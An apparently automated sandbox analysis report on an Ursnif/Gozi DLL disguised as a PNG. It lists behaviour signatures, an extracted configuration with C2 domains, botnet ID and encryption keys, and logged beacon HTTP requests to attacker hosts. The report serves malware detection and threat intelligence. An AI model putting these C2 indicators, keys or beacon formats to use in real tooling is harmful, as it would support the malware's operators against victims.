Windows Analysis Report 6.png

Overview

General Information

Sample Name:	6.png (renamed file extension from png to dll)
Analysis ID:	539457
MD5:	ac57d694b86d8532b38d3d62f6de3afc
SHA1:	c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256:	fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags:	dllexegeofencedGoziisfbITAursnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Maps a DLL or memory area into another process

Writes to foreign memory regions

PE file has a writeable .text section

Writes or reads registry keys via WMI

Machine Learning detection for sample

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Call by Ordinal

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Sigma detected: Suspicious Csc.exe Source File Folder

Writes registry values via WMI

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sigma detected: Suspicious Rundll32 Activity

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Searches for the Microsoft Outlook file path

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Registers a DLL

PE / OLE file has an invalid certificate

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Machine Learning detection for sample

Source: 6.dll

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: 6.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 79.110.52.144 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 18.219.227.107 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 3.12.124.139 187	Jump to behavior

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443

Source: 6.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 6.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: 6.dll	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 6.dll	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: 6.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 6.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 6.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 6.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: 6.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: 6.dll	String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 6.dll	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload"
Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp	String found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/
Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/BS
Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp	String found in binary or memory: https://berukoneru.website/LAp
Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/O
Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/j
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/jP
Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/tyi
Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax"
Source: 6.dll	String found in binary or memory: https://nodejs.org0
Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp	String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://windows.update3.com/
Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmp	String found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
